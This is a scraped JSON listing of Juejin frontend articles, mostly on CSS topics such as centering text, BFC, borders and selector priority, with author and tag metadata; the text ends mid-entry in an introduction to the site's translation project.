{"article_id": "6844904067873914894", "article_info": {"article_id": "6844904067873914894", "user_id": "835284565232686", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], "visible_level": 0, "link_url": "https://juejin.im/post/6844904067873914894", "cover_image": "", "is_gfw": 0, "title": "🔥 常见的CSS文字居中显示", "brief_content": "本文首发于公众号:小夭同学,同步更新个人博客:故事胶片,转载请署名。代码不断更新中!!Demo预览在这儿!!!!代码预览Demo1、利用line-height和vertical-alignhtmlcs", "is_english": 0, "is_original": 1, "user_index": 9.765855520194, "original_type": 0, "original_author": "", "content": "", "ctime": "1582102489", "mtime": "1598548370", "rtime": "1582103931", "draft_id": "6845076642201600008", "view_count": 2110, "collect_count": 20, "digg_count": 22, "comment_count": 0, "hot_index": 127, "is_hot": 0, "rank_index": 0.00056904, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "835284565232686", "user_name": "卖坚果的怪叔叔", "company": "", "job_title": "公众号 「执行上下文」", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/33f41c19d0cb80f786d9986a29b8900c~300x300.image", "level": 3, "description": "不想做全栈的切图仔,不是一个好的切图仔~", "followee_count": 10, "follower_count": 595, "post_article_count": 58, "digg_article_count": 298, "got_digg_count": 2608, "got_view_count": 109591, "post_shortmsg_count": 25, "digg_shortmsg_count": 6, "isfollowed": false, "favorable_author": 0, "power": 3937, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 77, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6844904067873914894, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6958857811795279880", "article_info": {"article_id": "6958857811795279880", "user_id": "1063982989054590", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "07.CSS盒子的相关属性", "brief_content": "一.outline属性 outline表示元素的外轮廓 不占用空间 默认显示在border的外面 outline相关属性有 outline-width outline-style:取值跟border的", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1620235560", "mtime": "1620356818", "rtime": "1620356818", "draft_id": "6958850162865209375", "view_count": 307, "collect_count": 2, "digg_count": 5, "comment_count": 0, "hot_index": 20, "is_hot": 0, "rank_index": 0.00056865, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1063982989054590", "user_name": "Jason杰森", "company": "", "job_title": "", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/c18f598f605cb3471d2a2f7a1430b9f5~300x300.image", "level": 1, "description": "", "followee_count": 8, "follower_count": 4, "post_article_count": 46, "digg_article_count": 13, "got_digg_count": 45, "got_view_count": 4276, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 87, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6958857811795279880, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6969873114394001438", "article_info": {"article_id": "6969873114394001438", "user_id": "4424090520138744", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "BFC (Block Formatting Contexts) 块格式化上下文", "brief_content": "BFC (Block Formatting Contexts) 块格式化上下文,是页面上的一个独立渲染的区域,该区域会包含器内部的所有元素,并且区域内元素的渲染不会影响到区域外的元素", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1622800067", "mtime": "1623065754", "rtime": "1623065754", "draft_id": "6969861442296086541", "view_count": 187, "collect_count": 5, "digg_count": 5, "comment_count": 0, "hot_index": 14, "is_hot": 0, "rank_index": 0.00056797, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "4424090520138744", "user_name": "佛系小玩家", "company": "", "job_title": "前端", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2018/8/23/1656559a733cd346~tplv-t2oaga2asx-image.image", "level": 1, "description": "瞎折腾的前端", "followee_count": 45, "follower_count": 2, "post_article_count": 18, "digg_article_count": 70, "got_digg_count": 9, "got_view_count": 8943, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 98, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6969873114394001438, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6912656994667069454", "article_info": {"article_id": "6912656994667069454", "user_id": "1099167361165710", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "移动端开发套路总结", "brief_content": "本文只讲最基础的套路(适配问题),其他特殊问题特殊解决。 对于新项目开发,上文说的方式其实已经算最优解了。至于之前主流的方案lib-flexible+postcss-pxtorem的方案比较麻烦,而且lib-flexible的作者都说放弃了,改用viewport来代替此方案(h…", "is_english": 0, "is_original": 1, "user_index": 1.906920898424682, "original_type": 0, "original_author": "", "content": "", "ctime": "1609478643", "mtime": "1609487398", "rtime": "1609487398", "draft_id": "6912657803697995790", "view_count": 722, "collect_count": 19, "digg_count": 10, "comment_count": 0, "hot_index": 46, "is_hot": 0, "rank_index": 0.00056744, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1099167361165710", "user_name": "李牧敲代码", "company": "company", "job_title": "web", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/mosaic-legacy/3791/5035712059~300x300.image", "level": 2, "description": "web", "followee_count": 3, "follower_count": 4, "post_article_count": 42, "digg_article_count": 12, "got_digg_count": 29, "got_view_count": 22737, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 256, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6912656994667069454, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6844903550821072910", "article_info": {"article_id": "6844903550821072910", "user_id": "2911162518736152", "category_id": "6809637767543259144", "tag_ids": [6809640406058270733, 6809640407484334093, 6809640394175971342, 6809640837895585805], "visible_level": 0, "link_url": "http://elevenbeans.github.io/2018/01/12/front-end-layout-methods/", "cover_image": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2018/1/15/160f90853bdb08a7~tplv-t2oaga2asx-image.image", "is_gfw": 0, "title": "前端布局方式汇总及概念浅析", "brief_content": "1. 基础布局方式 2. 常见的布局概念以及实现方法 3. 响应式设计和自适应设计", "is_english": 0, "is_original": 0, "user_index": 0, "original_type": 1, "original_author": "", "content": "", "ctime": "1516006561", "mtime": "1598444446", "rtime": "1516006561", "draft_id": "0", "view_count": 4006, "collect_count": 106, "digg_count": 206, "comment_count": 4, "hot_index": 410, "is_hot": 0, "rank_index": 0.00056716, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2911162518736152", "user_name": "Elevenbeans", "company": "Ctrip IBU", "job_title": "前端开发", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/46ab7a7d211e0ba6b5d5d4e07136ad81~300x300.image", "level": 3, "description": "出道于阿里,目前就职于携程 IBU。前端非资深。熟悉 React,略懂 Node。", "followee_count": 15, "follower_count": 447, "post_article_count": 27, "digg_article_count": 135, "got_digg_count": 2159, "got_view_count": 74595, "post_shortmsg_count": 0, "digg_shortmsg_count": 4, "isfollowed": false, "favorable_author": 0, "power": 1115, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546525, "tag_id": "6809640406058270733", "tag_name": "设计", "color": "#F56868", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/f2e3a6fceb1a4f1ce6b6.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971510, "mtime": 1631689661, "id_type": 9, "tag_alias": "", "post_article_count": 6064, "concern_user_count": 218547}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}, {"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}, {"id": 2546837, "tag_id": "6809640837895585805", "tag_name": "服务器", "color": "#a3abad", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/be1879c7e9983dab0049.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489042149, "mtime": 1631666741, "id_type": 9, "tag_alias": "", "post_article_count": 10408, "concern_user_count": 20830}], "user_interact": {"id": 6844903550821072910, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6942788958480760862", "article_info": {"article_id": "6942788958480760862", "user_id": "3438928104021463", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "css - 选择器优先级", "brief_content": "从CSS选择器文章中我们知道,与多种不同的方法选择元素。所以当我们使用多种规则的时候,我们必须要明确其中的优先级。但是在CSS选择器的规则中,称之为特殊性,特殊性越高,自然优先级越高。 对于选择器中给定的元素选择器和伪元素,加0001. 当选择器出于同一种特殊性的时候,位于cs…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1616494222", "mtime": "1620196409", "rtime": "1616553967", "draft_id": "6942782019369697288", "view_count": 404, "collect_count": 2, "digg_count": 9, "comment_count": 0, "hot_index": 29, "is_hot": 0, "rank_index": 0.00056563, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3438928104021463", "user_name": "耳东蜗牛", "company": "公众号【前端耳东蜗牛】", "job_title": "前端主管", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/e2c8e2f6002476ed4f6d797ecacba90d~300x300.image", "level": 3, "description": "公众号【前端耳东蜗牛】。前端学习,前端负责人培养,前端架构设计。", "followee_count": 34, "follower_count": 891, "post_article_count": 60, "digg_article_count": 242, "got_digg_count": 2944, "got_view_count": 112160, "post_shortmsg_count": 14, "digg_shortmsg_count": 5, "isfollowed": false, "favorable_author": 0, "power": 4065, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6942788958480760862, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6844903517971283982", "article_info": {"article_id": "6844903517971283982", "user_id": "1626932938285976", "category_id": "6809637767543259144", "tag_ids": [6809640420889346056, 6809640407484334093, 6809640394175971342, 6809640398105870343], "visible_level": 0, "link_url": "https://juejin.im/post/6844903517971283982", "cover_image": "", "is_gfw": 0, "title": "如何用语文知识改善代码可读性", "brief_content": "我们经常能看到许多技术文章从工程角度介绍各种编码实践。不过在计算机科学之外,编程语言和自然语言之间同样有着千丝万缕的联系。下面我们会从高中水平的语文和英语出发,分析它们与代码可读性之间的关系。如果你看腻了各种花哨的技术新概念,或许回归基础的本文能给你一些启发🤔 代码很难正确预…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1512033745", "mtime": "1598438812", "rtime": "1512033745", "draft_id": "6845075320630935559", "view_count": 4634, "collect_count": 32, "digg_count": 159, "comment_count": 37, "hot_index": 427, "is_hot": 0, "rank_index": 0.00056549, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1626932938285976", "user_name": "doodlewind", "company": "稿定科技", "job_title": "花名雪碧的小透明", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/ecbaedae9c3d45716d5c30f94436877b~300x300.image", "level": 5, "description": "过气啦", "followee_count": 52, "follower_count": 9994, "post_article_count": 72, "digg_article_count": 58, "got_digg_count": 12711, "got_view_count": 591008, "post_shortmsg_count": 4, "digg_shortmsg_count": 20, "isfollowed": false, "favorable_author": 1, "power": 18632, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546536, "tag_id": "6809640420889346056", "tag_name": "编程语言", "color": "#C679FF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/cde94583e8f0ca3f6127.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435972663, "mtime": 1631690928, "id_type": 9, "tag_alias": "", "post_article_count": 3637, "concern_user_count": 120863}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}, {"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}, {"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631692583, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398956}], "user_interact": {"id": 6844903517971283982, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6970670612196884517", "article_info": {"article_id": "6970670612196884517", "user_id": "3852296999413352", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "CSS 盒子模型之边框(border)的注意点", "brief_content": "HTML 中如 <div></div> <span></span> <p></p> 等元素在网页上都是以一个方形盒子呈现,每个元素都叫做一个盒子,我们可以给这些盒子设置宽、高、内边距、外边距等参数来调", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1622985761", "mtime": "1623067295", "rtime": "1623032895", "draft_id": "6970665344142671909", "view_count": 276, "collect_count": 0, "digg_count": 1, "comment_count": 0, "hot_index": 14, "is_hot": 0, "rank_index": 0.00056548, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3852296999413352", "user_name": "夕暮寒露", "company": "", "job_title": "", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/a348999aa32f206c68924655a914cd7c~300x300.image", "level": 1, "description": "", "followee_count": 1, "follower_count": 1, "post_article_count": 14, "digg_article_count": 22, "got_digg_count": 39, "got_view_count": 2816, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 67, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6970670612196884517, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6888471725080903687", "article_info": {"article_id": "6888471725080903687", "user_id": "3940267903440856", "category_id": "6809637767543259144", "tag_ids": [6809640614175604744, 6809640394175971342], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "使用原生 CSS 实现响应式字体", "brief_content": "有时需要根据屏幕宽度将字体大小比例进行适配操作。奇怪的是,我见过有人为了实现这个功能经历了重重困难。例如 Ahmed Sakr 在他的文章 Medium 中概述的 RFS 的使用,尽管他很好地概述了 RFS 如何工作的,但在 CSS3 计算和比较时代,RFS 本身却是过时的淘汰…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1603847344", "mtime": "1615273929", "rtime": "1603858966", "draft_id": "6888470407083786247", "view_count": 943, "collect_count": 11, "digg_count": 15, "comment_count": 2, "hot_index": 64, "is_hot": 0, "rank_index": 0.00056467, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3940267903440856", "user_name": "Z招锦", "company": "税友集团", "job_title": "前端开发", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/7db45971152a94b4859c2e8bd72996ec~300x300.image", "level": 3, "description": "", "followee_count": 326, "follower_count": 85, "post_article_count": 44, "digg_article_count": 1346, "got_digg_count": 876, "got_view_count": 42310, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 1, "power": 1299, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546676, "tag_id": "6809640614175604744", "tag_name": "掘金翻译计划", "color": "#0081ff", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/95f7e8be776556ab8d82.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1454716787, "mtime": 1631689800, "id_type": 9, "tag_alias": "", "post_article_count": 2502, "concern_user_count": 42848}, {"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6888471725080903687, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": {"org_type": 1, "org_id": "6930489296285597696", "online_version_id": 6937212594310610981, "latest_version_id": 6937212594310610981, "power": 10141, "ctime": 1613630284, "mtime": 1631692819, "audit_status": 2, "status": 0, "org_version": {"version_id": "6937212594310610981", "icon": "https://p6-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/9763b1fa556f4cbd8ced21b60d3ed40c~tplv-k3u1fbpfcp-watermark.image", "background": "https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/2254bf401c3444129f8e3612c4b16308~tplv-k3u1fbpfcp-watermark.image", "name": "掘金翻译计划", "introduction": "# 掘金翻译计划\n\n\n[掘金翻译计划](https://juejin.im/tag/%E6%8E%98%E9%87%91%E7%BF%BB%E8%AF%91%E8%AE%A1%E5%88%92) 是一个翻译优质互联网技术文章的社区,文章来源为 [掘金](https://juejin.im) 上的英文分享文章。内容覆盖[区块链](#区块链)、[人工智能](#ai--deep-learning--machine-learning)、[Android](#android)、[iOS](#ios)、[前端](#前端)、[后端](#后端)、[设计](#设计)、[产品](#产品)、[算法](https://github.com/xitu/gold-miner/blob/master/algorithm.md)和[其他](#其他)等领域,以及各大型优质 [官方文档及手册](#官方文档及手册),读者为热爱新技术的新锐开发者。\n\n掘金翻译计划目前翻译完成 [2027](#近期文章列表) 余篇文章,官方文档及手册 [13](#官方文档及手册) 个,共有 [1000](https://github.com/xitu/gold-miner/wiki/%E8%AF%91%E8%80%85%E7%A7%AF%E5%88%86%E8%A1%A8) 余名译者贡献翻译和校对。\n\n# 官方指南\n\n[**推荐优质英文文章到掘金翻译计划**](https://github.com/xitu/gold-miner/issues/new/choose)\n\n<!--\nhttps://github.com/xitu/gold-miner/issues/new?title=推荐优秀英文文章&body=-%20原文链接:推荐文章前%20Google%20一下,尽量保证本文未被翻译%0A-%20简要介绍:介绍一下好不好啦,毕竟小编也看不太懂哎_(:з」∠)_)\n-->\n\n### 翻译计划译者教程\n\n1. [如何参与翻译](https://github.com/xitu/gold-miner/wiki/%E5%A6%82%E4%BD%95%E5%8F%82%E4%B8%8E%E7%BF%BB%E8%AF%91)\n2. 